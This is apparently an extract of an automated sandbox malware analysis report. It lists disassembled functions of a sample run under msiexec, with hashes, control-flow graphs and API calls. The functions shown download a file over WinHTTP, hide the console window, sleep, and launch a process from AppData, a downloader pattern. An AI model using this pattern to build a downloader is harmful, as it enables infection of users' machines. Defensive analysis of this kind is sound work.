                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                Function 003074AA Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: tpFy
                                                                                                                                                                                                                                • API String ID: 2994545307-504537500
                                                                                                                                                                                                                                • Opcode ID: 1590b1621b8b335201bfaa3bf4519d6beaa805b758fe07909fa7a5027ce3c9ba
                                                                                                                                                                                                                                • Instruction ID: a84e1619a6edc5bdcd7d2fc4c827a986897a260c9e78737cdb134e54b8b762ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1590b1621b8b335201bfaa3bf4519d6beaa805b758fe07909fa7a5027ce3c9ba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7512471755B448FD32ACE39CCA17A3BBD2EB96304F2D846DD0DA8B791D275A8018710
                                                                                                                                                                                                                                Function 003023D0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 42b02d03aa998277192be9ed65371eda3348278b60b442615ff1c92de7471bff
                                                                                                                                                                                                                                • Instruction ID: b9c7c05ca498afe1ce962789be4c4fa9ac6526ad10e7973d90e9f8b4387ec3e7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42b02d03aa998277192be9ed65371eda3348278b60b442615ff1c92de7471bff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D49168B6A093054BD72ADE65CCB577BB6D6EF86304F0E843DE8864B2D1E6719C00C792
                                                                                                                                                                                                                                Function 002ED5E6 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1647500905-0
                                                                                                                                                                                                                                • Opcode ID: faf1d9b39851012b8bbbffbecdd4d63ec6fa25be650322c63127f2a91d4768a3
                                                                                                                                                                                                                                • Instruction ID: 98bb4447d7256fc6c7c431c2bc9b13101a3d7139e1eecc24295bbd9c34c6ef18
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: faf1d9b39851012b8bbbffbecdd4d63ec6fa25be650322c63127f2a91d4768a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC61B8B2F993900BD724AA21AC533DFB6968FD1314F48443CE88997382DF781A1687D3
                                                                                                                                                                                                                                Function 00316480 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: cde1937316bc275a105f30bbda45552775367c88b0f707129f6c12b688fb2962
                                                                                                                                                                                                                                • Instruction ID: 59f84d9d1a4228942a25148478548289d268bfb03c86f5b66f45a85a7d3ebde5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cde1937316bc275a105f30bbda45552775367c88b0f707129f6c12b688fb2962
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71514A716083049FD726DF68C815B6BB7E2EBD9714F1A882CE5849B351E731DC81C792
                                                                                                                                                                                                                                Function 06183240 Relevance: 42.4, APIs: 16, Strings: 8, Instructions: 395COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 6183240-61832dd call 6188f00 call 6189b40 5 61832df 0->5 6 61832e1-61832f4 WinHttpCrackUrl 0->6 5->6 7 6183361-6183378 WinHttpOpen 6->7 8 61832f6-6183327 call 6182760 6->8 9 618337a-61833ab call 6182760 7->9 10 61833e5-6183404 WinHttpConnect 7->10 20 618332d-618333c 8->20 21 61837d2-61837ef call 6187f1e 8->21 9->21 24 61833b1-61833c0 9->24 13 6183474-61834a7 WinHttpOpenRequest 10->13 14 6183406-6183437 call 6182760 10->14 17 61834a9-61834da call 6182760 13->17 18 6183516-618352b WinHttpSendRequest 13->18 30 6183468-618346f WinHttpCloseHandle 14->30 31 6183439-6183448 14->31 46 618350b-6183511 17->46 47 61834dc-61834eb 17->47 22 6183758-6183791 call 6182760 18->22 23 6183531-618353c WinHttpReceiveResponse 18->23 28 618333e-618334c 20->28 29 6183352-618335c call 61882cc 20->29 51 61837be-61837c5 WinHttpCloseHandle 22->51 52 6183793-61837a2 22->52 23->22 35 6183542-6183562 call 6189b40 23->35 36 61833c2-61833d0 24->36 37 61833d6-61833e0 call 61882cc 24->37 28->29 32 61837f0-61837f5 call 618e289 28->32 29->21 30->21 40 618344a-6183458 31->40 41 618345e-6183465 call 61882cc 31->41 61 6183564 35->61 62 6183566-61835b4 call 6185c00 35->62 36->32 36->37 37->21 40->32 40->41 41->30 49 61837c7-61837d0 WinHttpCloseHandle * 2 46->49 55 61834ed-61834fb 47->55 56 6183501-6183508 call 61882cc 47->56 49->21 51->49 59 61837b4-61837bb call 61882cc 52->59 60 61837a4-61837b2 52->60 55->32 55->56 56->46 59->51 60->32 60->59 61->62 69 6183629-618364f WinHttpReadData 62->69 70 61835b6-61835ef call 6182760 62->70 71 618368e-6183694 call 6185b20 69->71 72 6183651-6183659 69->72 79 61835f5-6183604 70->79 80 61836c6-6183753 WinHttpCloseHandle * 3 call 6184f10 call 6187834 70->80 78 6183699-618369b 71->78 72->71 74 618365b-618366b call 6185280 72->74 81 6183670-618368c WinHttpReadData 74->81 78->80 82 618369d-61836c1 call 6182620 78->82 84 618361a-6183624 call 61882cc 79->84 85 6183606-6183614 79->85 80->21 81->71 81->72 82->80 84->80 85->32 85->84
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WinHttpCrackUrl.WINHTTP(?,?,00000000,?), ref: 061832EC
                                                                                                                                                                                                                                • WinHttpOpen.WINHTTP(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko),00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 0618336E
                                                                                                                                                                                                                                • WinHttpConnect.WINHTTP(00000000,?,?,00000000,?,?,00000000,?), ref: 061833F4
                                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(00000000,Failed to connect to server.,0000001C,?,?,00000000,?), ref: 06183469
                                                                                                                                                                                                                                • WinHttpOpenRequest.WINHTTP(00000000,GET,?,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 0618349D
                                                                                                                                                                                                                                • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 06183523
                                                                                                                                                                                                                                • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,00000000,?), ref: 06183534
                                                                                                                                                                                                                                • WinHttpReadData.WINHTTP(00000000,?,00001000,?), ref: 06183647
                                                                                                                                                                                                                                • WinHttpReadData.WINHTTP(00000000,?,00001000,00000000,?,00000000,00000000), ref: 06183684
                                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(00000000), ref: 061836CD
                                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(?), ref: 061836D5
                                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(00000000), ref: 061836D8
                                                                                                                                                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0618374B
                                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(00000000,Failed to send request or receive response.), ref: 061837C5
                                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(?), ref: 061837CD
                                                                                                                                                                                                                                • WinHttpCloseHandle.WINHTTP(00000000), ref: 061837D0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • GET, xrefs: 06183497
                                                                                                                                                                                                                                • Failed to open WinHTTP session., xrefs: 06183385
                                                                                                                                                                                                                                • Failed to crack URL., xrefs: 06183301
                                                                                                                                                                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko), xrefs: 06183369
                                                                                                                                                                                                                                • Failed to connect to server., xrefs: 06183411
                                                                                                                                                                                                                                • Failed to open HTTP request., xrefs: 061834B4
                                                                                                                                                                                                                                • Failed to open output file., xrefs: 061835C5
                                                                                                                                                                                                                                • Failed to send request or receive response., xrefs: 06183767
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Http$CloseHandle$DataOpenReadRequest$ConnectCrackIos_base_dtorReceiveResponseSendstd::ios_base::_
                                                                                                                                                                                                                                • String ID: Failed to connect to server.$Failed to crack URL.$Failed to open HTTP request.$Failed to open WinHTTP session.$Failed to open output file.$Failed to send request or receive response.$GET$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                                                                                                                                • API String ID: 3056166987-2845382455
                                                                                                                                                                                                                                • Opcode ID: 2cca7ad251a1accf050dfdab240484c0ba5d784a4b967c39250f172ff3ebeae4
                                                                                                                                                                                                                                • Instruction ID: d248785217ca1425a4c462cf523ae8601fe8bd2c2889cb4e88a25d7a18b33720
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cca7ad251a1accf050dfdab240484c0ba5d784a4b967c39250f172ff3ebeae4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8E1AF75E002189FDBA5EB24CC94BEEB7B5AF49740F1442D9E819A7680E774AEC4CF40
                                                                                                                                                                                                                                Function 06183890 Relevance: 21.7, APIs: 8, Strings: 4, Instructions: 674processsynchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 198 6183890-61838e4 call 6188f00 GetConsoleWindow ShowWindow SleepEx SHGetFolderPathA 201 618396a-6183971 198->201 202 61838ea-6183922 call 6182760 198->202 204 6183974-6183979 201->204 207 6183951-6183967 call 6187f1e 202->207 208 6183924-6183931 202->208 204->204 206 618397b-61839ad 204->206 209 61839af-61839c1 206->209 210 61839c3-61839d1 call 6186e80 206->210 211 6183933-6183941 208->211 212 6183947-618394e call 61882cc 208->212 214 61839d6-61839ff call 6182d20 call 6183060 209->214 210->214 211->212 217 61842c5-61842eb call 618e289 call 61866a0 call 61859c0 211->217 212->207 228 6183a01-6183a14 214->228 229 6183a34-6183a79 call 6187975 call 6185460 214->229 231 6183a2a-6183a31 call 61882cc 228->231 232 6183a16-6183a24 228->232 240 6183a7b-6183a82 call 6187100 229->240 241 6183a84-6183a99 call 6187100 229->241 231->229 232->217 232->231 246 6183aca-6183af3 call 6183060 240->246 241->246 247 6183a9b-6183aa9 241->247 254 6183af9-6183b43 call 6186d80 call 6186510 246->254 255 61842a7 call 6181b60 246->255 248 6183aab 247->248 249 6183ac4 247->249 251 6183ab0-6183ac2 call 6187100 248->251 249->246 251->249 265 6183b78-6183b86 254->265 266 6183b45-6183b58 254->266 260 61842ac call 618e289 255->260 264 61842b1 call 6181b60 260->264 270 61842b6 call 618e289 264->270 265->264 271 6183b8c-6183bd6 call 6186d80 call 6186510 265->271 268 6183b5a-6183b68 266->268 269 6183b6e-6183b75 call 61882cc 266->269 268->260 268->269 269->265 276 61842bb call 6181b60 270->276 283 6183bd8-6183beb 271->283 284 6183c0b-6183c88 call 6182bf0 * 2 271->284 280 61842c0 call 618e289 276->280 280->217 286 6183bed-6183bfb 283->286 287 6183c01-6183c08 call 61882cc 283->287 293 6183c8a-6183c9f 284->293 294 6183ca1-6183cad call 6186e80 284->294 286->270 286->287 287->284 295 6183cb2-6183d09 293->295 294->295 297 6183d0b-6183d20 295->297 298 6183d22-6183d2e call 6186e80 295->298 299 6183d33-6183d65 call 6183240 * 2 297->299 298->299 299->276 305 6183d6b-6183de1 call 6186d80 call 61865d0 call 6186510 call 61865d0 299->305 314 6183de3-6183df6 305->314 315 6183e16-6183e34 305->315 318 6183df8-6183e06 314->318 319 6183e0c-6183e13 call 61882cc 314->319 316 6183e69-6183e87 315->316 317 6183e36-6183e49 315->317 323 6183e89-6183e9c 316->323 324 6183ebc-6183f16 call 6189b40 CreateProcessW 316->324 321 6183e4b-6183e59 317->321 322 6183e5f-6183e66 call 61882cc 317->322 318->280 318->319 319->315 321->280 321->322 322->316 327 6183e9e-6183eac 323->327 328 6183eb2-6183eb9 call 61882cc 323->328 333 6183f18-6183f34 WaitForSingleObject CloseHandle * 2 324->333 334 6183f36-6183f40 324->334 327->280 327->328 328->324 333->334 336 6183f78-6183fa2 334->336 337 6183f42-6183f58 334->337 340 6183fda-6184004 336->340 341 6183fa4-6183fba 336->341 338 6183f5a-6183f68 337->338 339 6183f6e-6183f75 call 61882cc 337->339 338->217 338->339 339->336 345 618403c-6184066 340->345 346 6184006-618401c 340->346 343 6183fbc-6183fca 341->343 344 6183fd0-6183fd7 call 61882cc 341->344 343->217 343->344 344->340 349 6184098-61840c0 345->349 350 6184068-6184078 345->350 347 618401e-618402c 346->347 348 6184032-6184039 call 61882cc 346->348 347->217 347->348 348->345 356 61840f2-618411a 349->356 357 61840c2-61840d2 349->357 354 618407a-6184088 350->354 355 618408e-6184095 call 61882cc 350->355 354->217 354->355 355->349 359 618411c-6184132 356->359 360 6184152-618417c 356->360 363 61840e8-61840ef call 61882cc 357->363 364 61840d4-61840e2 357->364 365 6184148-618414f call 61882cc 359->365 366 6184134-6184142 359->366 367 618417e-6184194 360->367 368 61841b4-61841de 360->368 363->356 364->217 364->363 365->360 366->217 366->365 372 61841aa-61841b1 call 61882cc 367->372 373 6184196-61841a4 367->373 374 61841e0-61841f6 368->374 375 6184216-6184220 368->375 372->368 373->217 373->372 381 61841f8-6184206 374->381 382 618420c-6184213 call 61882cc 374->382 377 6184222-6184238 375->377 378 6184254-618425e 375->378 384 618424a-6184251 call 61882cc 377->384 385 618423a-6184248 377->385 386 618428f-61842a4 call 6187f1e 378->386 387 6184260-6184273 378->387 381->217 381->382 382->375 384->378 385->217 385->384 391 6184285-618428c call 61882cc 387->391 392 6184275-6184283 387->392 391->386 392->217 392->391
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleWindow.KERNEL32 ref: 061838B0
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 061838B9
                                                                                                                                                                                                                                • SleepEx.KERNELBASE(00002710,00000000), ref: 061838C6
                                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 061838DC
                                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 06183F0E
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 06183F1E
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 06183F2E
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 06183F34
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseHandleWindow$ConsoleCreateFolderObjectPathProcessShowSingleSleepWait
                                                                                                                                                                                                                                • String ID: " "$.pif$D$Failed to get AppData path.
                                                                                                                                                                                                                                • API String ID: 161660808-1906643966
                                                                                                                                                                                                                                • Opcode ID: 3a4e5fce373f35f9c43efa19c569f2768cd287550dad4ef1fe0eeef19bf719b2
                                                                                                                                                                                                                                • Instruction ID: ca7356c36b262144592492975de1762d2b5276244e871626b18c8fe2ec9ab4ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a4e5fce373f35f9c43efa19c569f2768cd287550dad4ef1fe0eeef19bf719b2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE42E5715182418FD3A8EB74DC94BAFB3E6BFD4314F548A1CE19987690EB34A584CF82
                                                                                                                                                                                                                                Function 0619CC50 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 398 619cc50-619cc80 call 619ca2c 401 619cc9b-619cca7 call 61997ec 398->401 402 619cc82-619cc8d call 618ee31 398->402 408 619cca9-619ccbe call 618ee31 call 618ee44 401->408 409 619ccc0-619cd09 call 619c997 401->409 407 619cc8f-619cc96 call 618ee44 402->407 418 619cf75-619cf79 407->418 408->407 416 619cd0b-619cd14 409->416 417 619cd76-619cd7f GetFileType 409->417 421 619cd4b-619cd71 GetLastError call 618edea 416->421 422 619cd16-619cd1a 416->422 423 619cdc8-619cdcb 417->423 424 619cd81-619cdb2 GetLastError call 618edea CloseHandle 417->424 421->407 422->421 427 619cd1c-619cd49 call 619c997 422->427 425 619cdcd-619cdd2 423->425 426 619cdd4-619cdda 423->426 424->407 435 619cdb8-619cdc3 call 618ee44 424->435 430 619cdde-619ce2c call 6199737 425->430 426->430 431 619cddc 426->431 427->417 427->421 441 619ce4b-619ce73 call 619c741 430->441 442 619ce2e-619ce3a call 619cba6 430->442 431->430 435->407 447 619ce78-619ceb9 441->447 448 619ce75-619ce76 441->448 442->441 449 619ce3c 442->449 451 619cebb-619cebf 447->451 452 619ceda-619cee8 447->452 450 619ce3e-619ce46 call 6193d2f 448->450 449->450 450->418 451->452 453 619cec1-619ced5 451->453 454 619ceee-619cef2 452->454 455 619cf73 452->455 453->452 454->455 458 619cef4-619cf27 CloseHandle call 619c997 454->458 455->418 461 619cf29-619cf55 GetLastError call 618edea call 61998ff 458->461 462 619cf5b-619cf6f 458->462 461->462 462->455
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0619C997: CreateFileW.KERNELBASE(00000000,00000000,?,0619CCF9,?,?,00000000,?,0619CCF9,00000000,0000000C), ref: 0619C9B4
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0619CD64
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0619CD6B
                                                                                                                                                                                                                                • GetFileType.KERNELBASE(00000000), ref: 0619CD77
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0619CD81
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0619CD8A
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0619CDAA
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0619CEF7
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0619CF29
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0619CF30
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                • Opcode ID: cce03d1163197ca3d2a01eeb2aa3e9ebba195bb71f735229ee33fd10b46e3088
                                                                                                                                                                                                                                • Instruction ID: 9526c84e7c7a986e5b9435469cc8b88ca0d5764a5cda67c3a5deda03ef362c9f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cce03d1163197ca3d2a01eeb2aa3e9ebba195bb71f735229ee33fd10b46e3088
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73A13332E10154AFCF99AF78DC51BAE7BA1AF46324F18014DE851DB390DB308952CBE1
                                                                                                                                                                                                                                Function 002ED8B7 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 329COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 781 2ed8b7-2ed8f7 call 30dbe0 call 2e9b50 CoUninitialize 786 2ed900-2ed925 781->786 786->786 787 2ed927-2ed939 786->787 788 2ed940-2ed976 787->788 788->788 789 2ed978-2ed9f2 788->789 790 2eda00-2eda24 789->790 790->790 791 2eda26-2eda37 790->791 792 2eda5b-2eda63 791->792 793 2eda39-2eda47 791->793 795 2eda7b-2eda88 792->795 796 2eda65-2eda66 792->796 794 2eda50-2eda59 793->794 794->792 794->794 798 2eda8a-2eda91 795->798 799 2edaab-2edab3 795->799 797 2eda70-2eda79 796->797 797->795 797->797 802 2edaa0-2edaa9 798->802 800 2edacb-2edad5 799->800 801 2edab5-2edab6 799->801 804 2edaeb-2edaf7 800->804 805 2edad7-2edadb 800->805 803 2edac0-2edac9 801->803 802->799 802->802 803->800 803->803 807 2edaf9-2edafb 804->807 808 2edb11-2edc34 804->808 806 2edae0-2edae9 805->806 806->804 806->806 809 2edb00-2edb0d 807->809 810 2edc40-2edc79 808->810 809->809 811 2edb0f 809->811 810->810 812 2edc7b-2edc9f 810->812 811->808 813 2edca0-2edcd2 812->813 813->813 814 2edcd4-2edcfe call 2ebcb0 813->814 816 2edd03-2edd24 814->816
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
